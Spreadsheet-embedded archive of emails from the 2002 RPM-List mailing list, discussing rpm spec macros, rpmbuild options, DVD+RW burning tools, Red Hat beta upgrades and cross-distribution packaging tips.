&gt; ftp://people.redhat.com/ckloiber/dvd+rw-tools-0.1.src.rpmNice! :-)
What about the "dvdrecord" package that's already included in 7.3? It
doesn't do what this one does? I'm asking this because I've got a friend
with an iMac running YellowDog Linux (basically Red Hat Linux for PPC), and
it's one of the newer versions with a DVD burner. I'd be very interested in
using his drive to burn DVDs full of 2-CDs movies or full of "files for
xmame" ;-)
Also, a bootable DVD of Red Hat Linux 7.3 would be great as I've still not
burned the CDs even once for myself since I always install through the
network (and haven't found an easy way of purchasing an english boxed set
here in Spain...).Matthias--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
</t>
  </si>
  <si>
    <t xml:space="preserve"> --- Matthias Saou  wrote: &gt; Once
upon a time, Chris wrote :
&gt; 
&gt; &gt; To bring things back on topic, I was practicing my
&gt; "rpmbuild'n skillz"
&gt; &gt; and made an rpm with some simple software tools to
&gt; drive my DVD+RW
&gt; &gt; burner. No GUI frontend, but it works just fine
&gt; from the command line. I
&gt; &gt; even used it to burn a bootable DVD version of Red
&gt; Hat 7.3.
&gt; &gt; 
&gt; &gt;
&gt;
ftp://people.redhat.com/ckloiber/dvd+rw-tools-0.1.src.rpm
&gt; 
&gt; Nice! :-)
&gt; What about the "dvdrecord" package that's already
&gt; included in 7.3? It
&gt; doesn't do what this one does? I'm asking this
&gt; because I've got a friend
&gt; with an iMac running YellowDog Linux (basically Red
&gt; Hat Linux for PPC), and
&gt; it's one of the newer versions with a DVD burner.
&gt; I'd be very interested in
&gt; using his drive to burn DVDs full of 2-CDs movies or
&gt; full of "files for
&gt; xmame" ;-)
&gt; Also, a bootable DVD of Red Hat Linux 7.3 would be
&gt; great as I've still not
&gt; burned the CDs even once for myself since I always
&gt; install through the
&gt; network (and haven't found an easy way of purchasing
&gt; an english boxed set
&gt; here in Spain...).
&gt; 
&gt; Matthias
&gt; 
That's done by bero - not too sure whether it works on
DVD+RW drives, I believe it supports only DVD-R.Would be nice to have a unified tool for DVD/CD
burning - already I do my CD burning from dvdrecord
since it is more recent.Regards,Michel__________________________________________________
Do You Yahoo!?
Everything you'll ever need on one web page
from News and Sport to Email and Music Charts
http://uk.my.yahoo.com_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Just a quick question....  does anyone know of a public Ximian apt/rpm
repository?(I know, I know....  but some ppl kinda like it:-))Thanks-
                         -Chris_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t>Hi.Dave Cridland  wrote:&gt; &gt; recommends *against* using '%configure' ("We will try to support users
&gt; &gt; who accidentally type the leading % but this should not be relied
&gt; &gt; upon."), and yet[snip]&gt; They're just suggesting people use "./configure" instead.No, they do not (what would be the use of that, anyway?). They say that
they will _try_ to eval macros even if the user forgot to pass the
leading '%', but that this feature should not be relied upon.-- 
On the first day of Christmas my true love sent to me
       A badly configured newsreader_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>&gt; -----Original Message-----
&gt; From: Ralf Ertzinger [mailto:ralf@camperquake.de]
&gt; Sent: Thursday, August 15, 2002 2:53 PM
&gt; To: rpm-zzzlist@freshrpms.net
&gt; Subject: Re: Documentation about built-in RPM macros?
&gt; 
&gt; 
&gt; Hi.
&gt; 
&gt; Dave Cridland  wrote:
&gt; 
&gt; &gt; &gt; recommends *against* using '%configure' ("We will try to 
&gt; support users
&gt; &gt; &gt; who accidentally type the leading % but this should not be relied
&gt; &gt; &gt; upon."), and yet
&gt; 
&gt; [snip]
&gt; 
&gt; &gt; They're just suggesting people use "./configure" instead.
&gt; 
&gt; No, they do not (what would be the use of that, anyway?). 
&gt; They say that
&gt; they will _try_ to eval macros even if the user forgot to pass the
&gt; leading '%', but that this feature should not be relied upon.
&gt; Hmm.  1. The quote is not suggesting that people use './configure'.
2. The quote is not saying that rpm will _try_ to eval macros even
if the user forgot to pass the leading '%'.  It is saying the opposite:
rpm will try to support users who "forgot" to _leave off_ the leading
'%'.  That is what the documentation _says_, but rpm does not follow
the documentation.  If you leave off the '%', then rpm will not eval
the macro, at least for rpm 4.0.4.Confused?Anyway, back to my original problem: what about documentation for
the macros '%post', '%postun', and '%files'?  Here's some of what
I found "documented" in the the CHANGES file that 'rpm' includes:Line 46:
	- macro for %files, always include %defattr(), redhat config
only.Line 49:
	- bail on %files macro.Hmm.  So, there is no %files macro?Line 172-174:
	- add "rpmlib(ScriptletInterpreterArgs)" to track
	    %post -p "/sbin/ldconfig -n /usr/lib"
	  incompatibilities.I'm unable to find a corresponding description for %postun, but it
appears to work just the same.  The important things to remember are:  1. Don't forget the double-quotes around the -p argument string.  If
     you leave them off, you'll get the cryptic error message:     error: line #: Package does not exist: %post -p /sbin/ldconfig -n
/usr/lib  2. This only works with RPM 4.0.3 or later.&gt; -- 
&gt; On the first day of Christmas my true love sent to me
&gt;        A badly configured newsreader
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
&gt; _______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On 14 Aug 2002 10:59:22 -0400, "Thomas J. Baker"  wrote:&gt; Has anyone had any luck with the gstreamer repository? I'm using RH 7.3
&gt; and Ximian Gnome 2 snaps and the gstreamer stuff just doesn't work at
&gt; all. Rhythmbox crashes on startup, gst-player can't play a simple mpg
&gt; file, etc.    I'm in your same shoes- I can get it upgraded and all, but I can never seem to work out where to start out with the thing; it strikes me as confusing!  But to be fair, I appreciate the pipline idea; just as it's useful on the commandline, it'll be emensely powerful for manipulating multimedia, too.    It's just not EASY yet.  I'm sure all kindsa glade-produced front-ends will come up for it soon, though.  And the docs are complete, too...
------------------------------------------------------------------------
Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
Evansville, IN                    My Voyage: http://www.CounterMoon.com
ICQ  5119262
------------------------------------------------------------------------
"Waddling" into the mainstream?  I suppose...
http://www.usatoday.com/usatonline/20020805/4333165s.htm_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Hi,   Can someone tell me where I can find some
   documentation about rpm macros?  In
   particular, I'd like to understand the
   '%files devel', '%post -p', and '%postun -p'
   uses described at     http://freshrpms.net/docs/fight.html   and, more generally, I'm looking for a
   more detailed description of the available
   macros and the options they accept.  There's
   no description of the above uses of %file,
   %post, or %postun in the maximum-rpm book.   Thanks in advance for any help!---_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Wed, Aug 14, 2002 at 10:59:22AM -0400, Thomas J. Baker wrote:
&gt; Has anyone had any luck with the gstreamer repository? I'm using RH 7.3
&gt; and Ximian Gnome 2 snaps and the gstreamer stuff just doesn't work at
&gt; all. Rhythmbox crashes on startup, gst-player can't play a simple mpg
&gt; file, etc.I've been using the gstreamer repository with Rawhide Gnome 2 for the
last month or so with no problems. Even the new rhythmbox works (if
you can call taking 5 minutes to load my mp3 directory "working").It might be something with Ximian's Gnome 2 snaps. AFAIK, they're 
pretty much straight out of CVS and hence a lot more experimental than 
some of the other Gnome 2 packages out there.gary_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Ralf wrote :&gt; Skipping all RPM build parts except for the actual packing is not
&gt; possibleActually it is (sort of).
To answer partly the original question, this might have been useful once
the %files error was corrected :rpmbuild -bi --short-circuit This will skip all the way to the %install and start from there. Of course,
you need to have already done everything else before, and this will _not_
produce any rpm files, but will at least tell you if everything is now able
to finish successfully.Sure, it's not perfect since if the %files error was actually because
entries were missing you'll notice it only once the package is really
installed. But for multiple typos in the %files section (like when you're
writing a spec file after 2AM ;-)) it can come in handy :-)It's also very useful if you need to override some Makefile variables
during install, when the simple cases like "%makeinstall" or "make install
DESTDIR=%{buildroot}" don't work. It keeps you from redoing all the
unpacking and building processes.Matthias--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</si>
  <si>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Joshua wrote :&gt; Does anyone know how often the apt.freshrpms.net repository is 
&gt; updated? Is it rsync'ed? It's quite a bit out of date right now. For a
&gt; BIND update released mid-July, for example, it has:This is very strange... the Red Hat mirror update is run at least 3 or 4
times a week, I'll look into it right now.Thanks for reporting this!Matthias--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</si>
  <si>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Well, thanks everyone for the explanations. I still disagree with the 
reasoning, but it seems this is one of those philosophical questions 
that I'm on the losing end of :)The checkinstall utility that someone mentioned seems useful, but I 
don't really have the time to figure it out right now. After searching 
the web some more, I found out that Mandrake's version of rpm is 
patched to support what I wanted. So I guess I'll look into that when 
I get a chance.On Thu, Aug 15, 2002 at 05:14:47PM +0200, Ralf Ertzinger wrote:
&gt; Do nothing in the %build section, and copy the existing binaries
&gt; in %install.As far as I can tell, this could be useful for my situation too. It's 
not a complete solution since I can't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faster.gary_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Please see:http://dudex.net/rpms/lincvs-0.9.90-rh7.123.specsnipet:
&gt;# extract the ESP package archive
&gt;tar xvf lincvs.ssThat *.ss file is really a tar file, I had to use the linCVS pre-compiled binary
from their ESP install thingie because the one I compiled on my RH box would not run
on as many systems. The guy said something like this: "it's an evil binary that only
runs on one system", so I took the hint :)NOTE: I think I understand why RPM makes you go thru the whole build process: prep,
patch, build, install, package ... there are ways to get around this, but the
package would not be "from pristine sources" so to speak. I read that the 1st big
change they made to RPM was to always use "pristine" sources, then have prep apply
the packager's patches; whereas the early RPMS were already RH patched, apparently,
not having the "pristine" sources as the author had released them.Just a guess ... ???Gary Peck (gbpeck@sbcglobal.net) wrote*:
&gt;
&gt;On Wed, Aug 14, 2002 at 10:14:18PM -0700, Jesse Keating wrote:
&gt;&gt; On Wed, 14 Aug 2002 22:03:36 -0700
&gt;&gt; Gary Peck  wrote:
&gt;&gt;
&gt;&gt; #
&gt;&gt; #The closest I've gotten is to use "rpmbuild -bi --short-circuit" but
&gt;&gt; #that falls one step short of actually creating the rpm files. There
&gt;&gt; #must be some obvious option I'm missing...
&gt;&gt;
&gt;&gt; By design, I don't believe there is a way to do what you are asking.
&gt;
&gt;Out of curiousity, is there any particular reason for the design? It
&gt;seems like it'd be an extremely useful option to have -- especially
&gt;when building large programs that take hours to compile.
&gt;
&gt;
&gt;The current implementation already does EVERYTHING (including checking
&gt;the %files list and running find-provides and find-requires) except
&gt;for generating the actual rpm files. I'm sure if I were to look into
&gt;the source, I could write a patch that wouldn't take more than a
&gt;handful of lines.
&gt;
&gt;
&gt;gary
&gt;
&gt;_______________________________________________
&gt;RPM-List mailing list 
&gt;--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Wed, 2002-08-14 at 05:23, Matthias Saou wrote:
&gt; Once upon a time, Chris wrote :
&gt; 
&gt; &gt; To bring things back on topic, I was practicing my "rpmbuild'n skillz"
&gt; &gt; and made an rpm with some simple software tools to drive my DVD+RW
&gt; &gt; burner. No GUI frontend, but it works just fine from the command line. I
&gt; &gt; even used it to burn a bootable DVD version of Red Hat 7.3.
&gt; &gt; 
&gt; &gt; ftp://people.redhat.com/ckloiber/dvd+rw-tools-0.1.src.rpm
&gt; 
&gt; Nice! :-)
&gt; What about the "dvdrecord" package that's already included in 7.3? It
&gt; doesn't do what this one does? I'm asking this because I've got a friend
&gt; with an iMac running YellowDog Linux (basically Red Hat Linux for PPC), and
&gt; it's one of the newer versions with a DVD burner. I'd be very interested in
&gt; using his drive to burn DVDs full of 2-CDs movies or full of "files for
&gt; xmame" ;-)No, the 7.3 dvdrtools works with DVD-R and DVD-RW, this package works
with DVD+R and DVD+RW. (Confused yet?) Unfortuantely these tools don't
have a gui frontend, but since the workhorse is a wrapper for mkisofs,
that shouldn't be too hard for someone who knows how to do those things.&gt; Also, a bootable DVD of Red Hat Linux 7.3 would be great as I've still not
&gt; burned the CDs even once for myself since I always install through the
&gt; network (and haven't found an easy way of purchasing an english boxed set
&gt; here in Spain...).Well that was an image I put together of just the first three disks of
the distro. Make it bootable too. Fun, but slower than a network
install.-- 
Chris Kloiber_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>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Chris Kloiber_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Any sage advice on the most painless way to upgrade from old limbo (.92) to new
limbo (.93)?Apt for rpm from the 7.3 days barely works on Limbo1, and the package:
apt-0.5.4cnc6-dwd2.src.rpm will not compile on the Libbo1 box (I was going to use
that to dist-upgrade to Limbo2).Compile gave error on file "genpkglist.cc". First, it included "rpm/header.h" ok,
but 2 other includes from that file (rpmio.h, hdrinline.h) could not be found. So I
further patched the enviorment file to have "-I/usr/include/rpm".I guess that worked, but then I get this error (see below).Ohh... the pain. Any advice?
Compiling genpkglist.cc (ed.)/rpm/BUILD/apt-0.5.4cnc6/obj/tools/genpkglist.o
genpkglist.cc: In function `int main(int, char**)':
genpkglist.cc:586: `rpmReadPackageHeader' undeclared (first use this function)
genpkglist.cc:586: (Each undeclared identifier is reported only once for each
   function it appears in.)
genpkglist.cc:604:33: macro "headerFree" requires 2 arguments, but only 1 given
genpkglist.cc:604: `headerFree' undeclared (first use this function)
genpkglist.cc:605:25: macro "headerFree" requires 2 arguments, but only 1 given
make[2]: *** [(ed.)/rpm/BUILD/apt-0.5.4cnc6/obj/tools/genpkglist.o] Error 1
make[1]: *** [all] Error 2
make: *** [all] Error 2
error: Bad exit status from (ed.)/tmp/rpm-tmp.18285 (%build)--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, ""Angles" wrote :&gt; Any sage advice on the most painless way to upgrade from old limbo (.92)
&gt; to new limbo (.93)?
&gt; 
&gt; Apt for rpm from the 7.3 days barely works on Limbo1, and the package:
&gt; apt-0.5.4cnc6-dwd2.src.rpm will not compile on the Libbo1 box (I was
&gt; going to use that to dist-upgrade to Limbo2).Well, the 7.3 binary should work as long as you install the "rpm404" (IIRC)
compatibility library. The only problem I have with some rpm 4.1 versions
is that it sometimes hangs at the and of operations (-e, -i, -F or -U) and
the only workaround is to kill it, "rm -f /var/lib/rpm/__*" and try again.Matthias--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</si>
  <si>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Matthias Saou wrote:
&gt; Once upon a time, ""Angles" wrote :
&gt; 
&gt; 
&gt;&gt;Any sage advice on the most painless way to upgrade from old limbo (.92)
&gt;&gt;to new limbo (.93)?
&gt;&gt;
&gt;&gt;Apt for rpm from the 7.3 days barely works on Limbo1, and the package:
&gt;&gt;apt-0.5.4cnc6-dwd2.src.rpm will not compile on the Libbo1 box (I was
&gt;&gt;going to use that to dist-upgrade to Limbo2).
&gt; 
&gt; 
&gt; Well, the 7.3 binary should work as long as you install the "rpm404" (IIRC)
&gt; compatibility library. The only problem I have with some rpm 4.1 versions
&gt; is that it sometimes hangs at the and of operations (-e, -i, -F or -U) and
&gt; the only workaround is to kill it, "rm -f /var/lib/rpm/__*" and try again.Well, you're lucky if it sometimes works for you.  Mine hang all the 
time, have to kill 'em with -9.  And after that, rpm doesn't work at all 
(hangs right after i run the command, prints nothing).  Have to reboot 
the machine to get anything rpm-related to work again.&gt; Matthias-silent
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Daniel wrote :&gt; &gt; Well, the 7.3 binary should work as long as you install the "rpm404"
&gt; &gt; (IIRC) compatibility library. The only problem I have with some rpm 4.1
&gt; &gt; versions is that it sometimes hangs at the and of operations (-e, -i,
&gt; &gt; -F or -U) and the only workaround is to kill it, "rm -f
&gt; &gt; /var/lib/rpm/__*" and try again.
&gt; 
&gt; Well, you're lucky if it sometimes works for you.  Mine hang all the 
&gt; time, have to kill 'em with -9.  And after that, rpm doesn't work at all 
&gt; (hangs right after i run the command, prints nothing).  Have to reboot 
&gt; the machine to get anything rpm-related to work again.After that "kill -9", removing the "__*" files in /var/lib/rpm/ and trying
again works 100% of the time for me. Did you try that?Matthias--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</si>
  <si>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Hi, I wanted to know if I could post a request for rpm on the list, or if I had
to contact Mathias directly ?
Thanks...-- 
Antoine Jacoutot
Linux - Redhat 7.3 Valhalla
ajacoutot@linuxfr.dyndns.org
http://linuxfr.dyndns.org
http://windowsfr.dyndns.org_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Antoine wrote :&gt; Hi, I wanted to know if I could post a request for rpm on the list, or if
&gt; I had to contact Mathias directly ?
&gt; Thanks...Well, since you posted, you could have asked just in case while you were at
it ;-) I don't often fulfill requests, so don't expect any miracles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</si>
  <si>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&gt; Once upon a time, Antoine wrote :
&gt; 
&gt; &gt; Hi, I wanted to know if I could post a request for rpm on the list, or if
&gt; &gt; I had to contact Mathias directly ?
&gt; &gt; Thanks...
&gt; 
&gt; Well, since you posted, you could have asked just in case while you were at
&gt; it ;-) I don't often fulfill requests, so don't expect any miracles :-/...true...
Well, I have so many requests that I can't decide which ones I go first... let's
say: drip, bastille, avidemux and motion.
I'm not asking... just proposing to you...
Thanks.
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>&gt; This is a common problem with some build files that think you're cross
&gt; compiling, and when you really are, this is in fact a feature :-/
&gt; 
&gt; The workaround is to pass an extra argument to configure as follows :
&gt; 
&gt; %configure --program-prefix=%{?_program_prefix:%{_program_prefix}}Merci. It worked nicely.Pat_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Fri, 2002-08-16 at 04:28, Angles Puglisi wrote:
&gt; Any sage advice on the most painless way to upgrade from old limbo (.92) to new
&gt; limbo (.93)?Format and reinstall. There is no supported upgrade path from beta to
beta, or from beta to release.-- 
Chris Kloiber
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Halloechen!If I create an RPM according to one of the how-to's with having
Red Hat in mind, how big are my chances that it will also work
for the SuSE distribution, or others?  (I don't know how many
base on the RPM system.)Or what must I pay attention to when creating an RPM that should
work with the big distributions?Tschoe,
Torsten._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Fri, 2002-08-16 at 20:58, Torsten Bronger wrote:&gt; If I create an RPM according to one of the how-to's with having
&gt; Red Hat in mind, how big are my chances that it will also work
&gt; for the SuSE distribution, or others?  (I don't know how many
&gt; base on the RPM system.)
&gt; 
&gt; Or what must I pay attention to when creating an RPM that should
&gt; work with the big distributions?One practice I've adopted is to list Requires: only when they're
absolutely necessary.  This will help because some packages are named
differently between distributions (eg. SDL &lt;-&gt; libSDL), and the
dependencies are automatically handled by RPM by depending on shared
library names.This doesn't apply to BuildRequires: though.Use macros for directory names where available, eg %{_libdir},
%{_bindir}, %{_datadir} etc.I'd like to suggest using as many RPM macros for command names as
possible too, but unfortunately I don't know of a definitive reference
about them...I have a small RedHat 7.3 RPM/apt repository at
, and I've received reports from people
running Mandrake 8.x and SuSE that the RPMs work with them out of the
box.-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>I realize this is an old thread, but I just had to comment:On Tuesday, Aug 13, 2002, at 08:43 US/Eastern, Matthias Saou wrote:&gt;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did.Julian
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Daniel wrote :&gt; What do you pleople think of the strategy to put prerelease
&gt; (alpha/beta/rc) information in the release field? The above example
&gt; should then have 6.1-0alpha5 as %{version}-%{release} and when the final
&gt; version was released it would have 6.1-1.Why not... it's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example.Take for instance xmame : I've been packaging 0.61 pre-releases as
"0.61-fr0.x" since the entire source has only "0.61" tags everywhere, no
preversion tags whatsoever.Still, I don't think "Epoch:" is an evil hack although it's true that it
may cause problems between distributions when used. Wanting to avoid it
when possible is a good thing indeed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</si>
  <si>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Once upon a time, Doug wrote :&gt; Perms are borked on your en/ directory.  Can't get in.Indeed, sorry.
Fixed now, happy download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</si>
  <si>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&gt; 
&gt; The workaround is to pass an extra argument to configure as follows :
&gt; 
&gt; %configure --program-prefix=%{?_program_prefix:%{_program_prefix}}
&gt; This works when you are defining a switch that %configure
does not already define, but how can we override an
existing switch?  For example,  prefix: /usr/local  %configure --prefix=%{?_prefix:%{prefix}}would be desirable for making a .rpm package relocatable,
but this doesn't work.  'configure' receives two switches,
the default '--prefix=/usr' and the (attempted) override
'--prefix=/usr/local', but it only recognizes the first one.---_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>This seems to be a good argument for the odd number prerelease, even number 
stables.So instead of a 0.61pre2 pre3,  and a 0.61final,  you'd stick with 0.61 
with different releases, and a 0.62.0.61-1, 0.61-2, 0.62.  Would that that?--On Monday, August 19, 2002 17:25:04 +0200 Matthias Saou 
 wrote:&gt; Take for instance xmame : I've been packaging 0.61 pre-releases as
&gt; "0.61-fr0.x" since the entire source has only "0.61" tags everywhere, no
&gt; preversion tags whatsoever.                                    -- \m/ --
  "...if I seem super human I have been misunderstood." (c) Dream Theater
         mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Harig, wrote :&gt; &gt; 
&gt; &gt; The workaround is to pass an extra argument to configure as follows :
&gt; &gt; 
&gt; &gt; %configure --program-prefix=%{?_program_prefix:%{_program_prefix}}
&gt; &gt; 
&gt; 
&gt; This works when you are defining a switch that %configure
&gt; does not already define, but how can we override an
&gt; existing switch?Well, %configure doesn't define "--program-prefix=", so that's why it
works. Maybe you thought that was an example, but no, it's the exact syntax
to use as a workaround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</si>
  <si>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Matthias Saou (matthias@egwn.net) wrote*:
&gt;Then why bother : The new Red Hat Linux beta "(null)" is now available and
&gt;should be announced anytime now. It contains rpm 4.1-0.81.Ahhh ... this is funny. Last night I upgraded to Limbo II (.93).Installed Limbo II kernel, Installed libstdc++ from rawhide (rpm -ivh) so the
newer apt would work, told apt it is OK to have multiple of libstdc++, copied
the actual rawhide "libstdc++.so.5.0.0" file to another directory, removed that
rawhide libstdc++ package, installed (rpm -ivh ) the Limbo II libstdc++ package
(new apt does not like it), make that symlink "libstdc++.so.5" point to that
rawhide file I moved earlier.Apt works again, dump the Limbo II rpms into a dir, run the "genaptrep.sh rh73",
but "topdir" arg had changed, edit script, rerun, makes apt repository for Limbo
II. Do "apt-get --ignore missing -f dist-upgrade". Apt wants to uninstall itself
because that rawhide libstdc++ package is not installed, but apt works for the
moment because of that symlink I made.Apt stays installed just long enough to issue the necessary "dist-upgrade"
commands, several hours later, I have Limbo II, shiny and new. The install even
made that symlink point back to the correct libstdc++ file.Several hours after that, I read my mail and realize that "null" directory I kept
seeing while downloading Limbo II was not a fluke.Ahh, the joy. Repeat the above ....--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>FYI..----- Original Message -----
From: "Bill Nottingham" 
To: 
Sent: Monday, August 19, 2002 10:40 AM
Subject: Everybody (null)... again!
&gt; The (null) beta of Red Hat Linux has been updated. New in this release
include:
&gt;
&gt; - gcc-3.2 - gcc-3.2 allows for better ABI compatibility going forward.
&gt;   Note that C++ apps compiled on the first beta will not run on this beta.
&gt; - lots-o-bugfixes
&gt;
&gt; Please report issues via Bugzilla at
http://bugzilla.redhat.com/bugzilla/ -
&gt; choose 'Red Hat Public Beta' as the product, and 'null' as the version.
&gt;
&gt; To discuss (null), send mail to Limbo-list-request@redhat.com with
&gt; 'subscribe' in the subject line. You can leave the body empty.
&gt;
&gt; The updated (null) is at ftp.redhat.com, and the following mirrors:
&gt;
&gt;  North America:
&gt;    * ftp://linux.nssl.noaa.gov/pub/linux/redhat/linux/beta/null/
&gt;    * ftp://ftp.shuttleamerica.com/pub/mirrors/redhat/linux/beta/null/
&gt;      (also rsync access)
&gt;    * ftp://redhat.dulug.duke.edu/pub/redhat/linux/beta/null/
&gt;      (http and also rsync access)
&gt;    * ftp://mirror.hiwaay.net/redhat/redhat/linux/beta/null/
&gt;    * ftp://mirror.netglobalis.net/pub/redhat-beta/null/
&gt;      (also http access)
&gt;    * ftp://ftp.gtlib.gatech.edu/pub/mirros/ftp.redhat.com/linux/beta/null/
&gt;  South America:
&gt;    * ftp://ftp.tecnoera.com/
&gt;  Europe:
&gt;    * ftp://ftp.uni-bayreuth.de/pub/redhat/linux/beta/null/
&gt;    * ftp://alviss.et.tudelft.nl/pub/redhat/beta/null/
&gt;    *
ftp://sunsite.mff.cuni.cz/MIRRORS/ftp.redhat.com/redhat/linux/beta/null/
&gt;    *
ftp://ftp.cs.huji.ac.il/mirror/linux/redhat/ftp/redhat/linux/beta/null/
&gt;    * ftp://ftp.funet.fi/pub/mirrors/ftp.redhat.com/redhat/linux/beta/null/
&gt;    * ftp://ftp-stud.fht-esslingen.de/pub/redhat/linux/beta/null/
&gt;  Asia/Pacific:
&gt;    * ftp://videl.ics.hawaii.edu/mirrors/redhat/linux/beta/null/
&gt;    * ftp://planetmirror.com/pub/redhat/linux/beta/null/_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>&gt; -----Original Message-----
&gt; From: Matthias Saou [mailto:matthias@egwn.net]
&gt; Sent: Monday, August 19, 2002 5:25 PM
&gt; To: rpm-zzzlist@freshrpms.net
&gt; Subject: Re: when building a rpm i386-redhat-linux- is appended to man
&gt; page
&gt; 
&gt; 
&gt; Once upon a time, Harig, wrote :
&gt; 
&gt; &gt; &gt; 
&gt; &gt; &gt; The workaround is to pass an extra argument to configure 
&gt; as follows :
&gt; &gt; &gt; 
&gt; &gt; &gt; %configure --program-prefix=%{?_program_prefix:%{_program_prefix}}
&gt; &gt; &gt; 
&gt; &gt; 
&gt; &gt; This works when you are defining a switch that %configure
&gt; &gt; does not already define, but how can we override an
&gt; &gt; existing switch?
&gt; 
&gt; Well, %configure doesn't define "--program-prefix=", so that's why it
&gt; works. Maybe you thought that was an example, but no, it's 
&gt; the exact syntax
&gt; to use as a workaround ;-)
&gt; 
&gt; Matthias
&gt; Actually, I was hoping that you could answer the question "how can we 
override an existing switch?"  For example, %configure uses the command-
line switch '--prefix'.  How can we override that value?  %configure ???---_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Mon, 2002-08-19 at 22:34, Angles Puglisi wrote:
&gt; Matthias Saou (matthias@egwn.net) wrote*:
&gt; &gt;Then why bother : The new Red Hat Linux beta "(null)" is now available and
&gt; &gt;should be announced anytime now. It contains rpm 4.1-0.81.
&gt; 
&gt; Ahhh ... this is funny. Last night I upgraded to Limbo II (.93).
&gt; 
&gt; Installed Limbo II kernel, Installed libstdc++ from rawhide (rpm -ivh) so the
&gt; newer apt would work, told apt it is OK to have multiple of libstdc++, copied
&gt; the actual rawhide "libstdc++.so.5.0.0" file to another directory, removed that
&gt; rawhide libstdc++ package, installed (rpm -ivh ) the Limbo II libstdc++ package
&gt; (new apt does not like it), make that symlink "libstdc++.so.5" point to that
&gt; rawhide file I moved earlier.You can just recompile the apt source RPM, if it's the newer one. (Such
as mine). There's no dependancies on libstdc++ other than binary ones.Currently on release dwd2, which I'm using on my home rawhide box.
(Obviously not production, since the old apt works fine on production
boxes).Now... Does anyone know of a good way to delete "old" RPMS from a
directory containing both "new" and "old" RPMS? Say I have
blurb-0.1.0-1.i386.rpm, blurb-0.1.0-2.i386.rpm, and
blurb-0.1.1-1.i386.rpm, and want to remove the blurb-0.1.0-* because of
the presence of blurb-0.1.1-1? Anyone have a convenient script?Dave.
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Harig, wrote :&gt; Actually, I was hoping that you could answer the question "how can we 
&gt; override an existing switch?"  For example, %configure uses the command-
&gt; line switch '--prefix'.  How can we override that value?
&gt; 
&gt;   %configure ???Quite honestly, I thought that the last occurrence was the one that
counted. I'm almost sure I've already done something like :
%configure --bindir=%{_sbindir}
or even
%configure --sysconfdir=%{_sysconfdir}/%{name}Are you sure that it was the first for you? Maybe you're forgetting to also
override it in %makeinstall like follows :
%makeinstall bindir=%{buildroot}%{_sbindir}
or even
%makeinstall sysconfdir=%{buildroot}%{_sysconfdir}/%{name}Is that it?Matthias--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</si>
  <si>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Fri, Aug 16, 2002 at 07:58:07PM +0200, Torsten Bronger wrote:
&gt; If I create an RPM according to one of the how-to's with having Red
&gt; Hat in mind, how big are my chances that it will also work for the
&gt; SuSE distribution, or others?  (I don't know how many base on the RPM
&gt; system.)
&gt; Or what must I pay attention to when creating an RPM that should work
&gt; with the big distributions?Note also that there's hope of rpm being used on other systems than
Linux.
Look at
http://www-1.ibm.com/servers/aix/products/aixos/linux/download.htmlI think a good way to guess is to look at others' spec files, hardcode
as little as possible, replace abolute paths and commands with macros
if possible and accept and request patches and suggestions :)-- 
